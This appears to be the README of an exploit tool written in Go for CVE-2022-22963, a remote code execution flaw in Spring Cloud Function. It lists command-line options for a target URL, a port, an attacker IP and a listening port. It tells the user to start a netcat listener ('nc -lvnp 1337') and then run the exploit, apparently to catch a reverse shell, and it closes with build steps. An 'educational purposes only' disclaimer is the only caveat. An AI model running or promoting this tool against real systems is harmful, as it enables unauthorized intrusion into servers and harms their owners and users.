# CVE-2022-22963

Remote Code Execution exploiting CVE-2022-22963 attacking Spring Cloud service.

**Disclamier: This is for educational purposes only. The author is not responsible for the use of this program. Use under your own risk**

## Usage
./CVE-2022-22963 -h

  CVE-2022-22963 [OPTIONS]

Application Options:
  -u, --target-url=     Target/Host url where 'Spring Cloud' is running. Example: -t http://somesite.htb
  -p, --target-port=    Port running the service. Example: -p 8080
  -i, --attacker-ip=    Attacker IPv4 Address. Example: -i
  -l, --listening-port= Listening port to connect. Example: -l 1337

Help Options:
  -h, --help            Show this help message

Assume a possible vulnerable target is running at ``. Start `nc` listening on the port `1337`, so we run `nc -lvnp 1337`. Then, run the script/exploit:
./CVE-2022-22963 -u -p 8080 -i -l 1337 

## Build from source
If you have `go` installed in your machine, just do:
git clone
cd CVE-2022-22963
go run main.go -h #run without compiling any file
go build -o exploit main.go #build the file